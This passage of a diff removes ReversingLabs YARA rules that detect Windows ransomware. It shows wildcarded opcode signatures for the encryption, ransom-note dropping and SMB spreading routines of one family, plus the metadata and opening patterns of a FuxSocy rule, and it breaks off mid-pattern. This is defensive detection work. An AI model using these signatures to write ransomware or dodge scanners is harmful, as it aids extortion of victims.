-            6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 6A ?? 56 8D
-            8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50
-            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ??
-            ?? 74 ?? FF 15 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            33 F6 E9 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B
-            01 FF 50 ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C6 45
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D
-        }
-		$encrypt_files_v2_p2 = {
-            8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ?? 8B 85 ?? ??
-            ?? ?? EB ?? 0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F
-            11 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50
-            ?? 6A ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 83 EC ?? 03 B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
-            8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ??
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C9 83 C4 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            81 FE ?? ?? ?? ?? 73 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 EB
-            ?? 8D 0C B6 B8 ?? ?? ?? ?? C1 E1 ?? F7 E1 8D 45 ?? 50 8D 45 ?? C1 EA ?? 50 6A ?? 6A
-            ?? 6A ?? 6A ?? 8B C6 2B C2 6A ?? 50 57 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 45
-            ?? 83 C4 ?? 57 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45
-        }
-		$encrypt_files_v2_p3 = {
-            57 6A ?? 6A ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
-            6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D 8D ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84
-            05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
-            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8
-            33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
-            ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84
-            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-        }
-		$encrypt_files_v2_p4 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 8B B5 ?? ?? ?? ?? 6A
-            ?? 50 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75
-            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
-            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 57 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
-            40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 50 ?? 8D 4A ?? 89 8C 15 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D 8B E3 5B C2
-        }
-		$drop_ransom_note_v2_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 50 8D
-            45 ?? 64 A3 ?? ?? ?? ?? 8B F1 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8B C6 66 83 3E ?? 74 ?? 0F 1F 80 ?? ?? ?? ?? 83 C0 ?? 66 83 38 ?? 75 ?? 50 56 8D
-            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 85 ?? ??
-            ?? ?? 3B C6 74 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 0F 10 06 0F 11 85 ?? ?? ?? ?? F3 0F 7E 46 ?? 66 0F D6 85 ?? ??
-            ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 8B 95 ?? ?? ?? ?? 83 FA
-        }
-		$drop_ransom_note_v2_p2 = {
-            72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 95 ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
-            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D 85 ?? ?? ?? ??
-            C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B 10 8B C8 6A ??
-            FF 12 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
-        }
-		$drop_ransom_note_v2_p3 = {
-            0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ??
-            ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40
-            ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? EB
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0
-            39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
-            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05
-            ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
-            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72
-            ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ??
-            ?? ?? ?? 8B E5 5D 8B E3 5B C3
-        }
-		$smb_spreading_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 3A ?? 0F 8E ?? ?? ?? ?? 33 DB 89 9D ?? ?? ?? ?? 8D 42
-            ?? 03 C3 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 66 90 8D 72 ?? 03 F0 8B CE 8D 79 ?? 66 0F
-            1F 44 00 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
-            ?? 50 6A ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 33 FF 39 BD ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 0F 1F 40 ?? 8B 85 ?? ??
-            ?? ?? 83 7C 06 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 34 06 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? FF 34 06 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF
-        }
-		$smb_spreading_v2_p2 = {
-            15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 47 83 C6 ?? 3B BD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 83 EB ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 46 81 C3 ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? 3B 32 0F 8C ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD 33 C0 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $network_enumeration_v1_p* ) ) and ( all of ( $delete_shadow_copies_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( all of ( $smb_spreading_v2_p* ) ) ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Fuxsocy : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects FuxSocy ransomware."
-		author = "ReversingLabs"
-		id = "f4a45469-9d51-523f-8238-c7044f353cf6"
-		date = "2021-03-01"
-		modified = "2021-03-01"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FuxSocy.yara#L1-L114"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8b3c04eb5d60fcc82e47cb8e78da0a98642666546d6799baef24b56926e3aceb"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FuxSocy"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files_1 = {
-            83 EC ?? 53 55 57 89 54 24 ?? 8B 54 24 ?? 51 33 DB E8 ?? ?? ?? ?? 8B E8 59 85 ED 0F
-            84 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CB E9
-            ?? ?? ?? ?? 53 53 FF 74 24 ?? 41 FF 74 24 ?? BF ?? ?? ?? ?? FF 74 24 ?? 3B C7 0F 42
-            F8 2B C7 89 4C 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ??
-            FF 74 24 ?? FF 15 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 54 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
-            59 59 57 8D 44 24 ?? 50 FF 74 24 ?? 33 C0 39 44 24 ?? 53 0F 94 C0 89 7C 24 ?? 50 53
-            55 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ??
-            ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 01 7C 24 ??
-            8B 4C 24 ?? 11 5C 24 ?? F6 C1 ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24
-            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 88 5C 24 ?? FF 74 24 ?? 8B 54 24 ?? 8B 4C 24 ?? E8
-            ?? ?? ?? ?? 59 8B 4C 24 ?? 55 89 41 ?? FF 15 ?? ?? ?? ?? 8A 5C 24 ?? 5F 5D 8A C3 5B
-            83 C4 ?? C3
-        }
-		$encrypt_files_2 = {
-            83 EC ?? 53 55 56 8B 74 24 ?? 8B C1 8B 36 57 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ??
-            8B F8 33 D2 8D 5F ?? 8B C6 F7 F3 33 C9 85 D2 0F 95 C1 89 54 24 ?? 33 D2 03 C8 89 4C
-            24 ?? 0F AF CF 89 4C 24 ?? E8 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 ?? ?? ?? ??
-            33 D2 8B CF E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 64 24 ?? ??
-            48 89 6C 24 ?? 89 44 24 ?? 74 ?? 53 FF 74 24 ?? 89 5C 24 ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 44 24 ?? 57 50 56 33 C0 50 50 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 33 C9 85 FF 74 ?? 8B 54 24 ?? 8D 6E ?? 03 EF 8A 45 ?? 4D 88 04 11 41 3B CF
-            72 ?? 8B 6C 24 ?? 8B 44 24 ?? 03 44 24 ?? 01 5C 24 ?? 89 44 24 ?? 8B 44 24 ?? 40 89
-            44 24 ?? 3B 44 24 ?? 72 ?? 8B 44 24 ?? 85 C0 0F 45 D8 53 FF 74 24 ?? 89 5C 24 ?? 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 57 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF 15 ??
-            ?? ?? ?? 8B D8 F7 DB 1A DB 80 E3 ?? 33 C9 85 FF 74 ?? 8B 6C 24 ?? 8D 56 ?? 03 D7 8A
-            02 4A 88 04 29 41 3B CF 72 ?? 8B 6C 24 ?? 8B CE E8 ?? ?? ?? ?? 84 DB 75 ?? 8B CD E8
-            ?? ?? ?? ?? 33 ED EB ?? 32 DB EB ?? 8B 4C 24 ?? 8B 44 24 ?? 89 01 5F 5E 8B C5 5D 5B
-            83 C4 ?? C3
-        }
-		$find_files_1 = {
-            81 EC ?? ?? ?? ?? 53 56 57 8B BC 24 ?? ?? ?? ?? 8B F2 89 74 24 ?? 8B D9 85 FF 0F 84
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B D7 C1 E2 ?? 8B
-            CE E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0
-            0F 84 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B E8
-            83 FD ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
-            24 ?? 83 E0 ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 75 ?? 85 C0 75 ?? F6 84 24 ?? ?? ?? ??
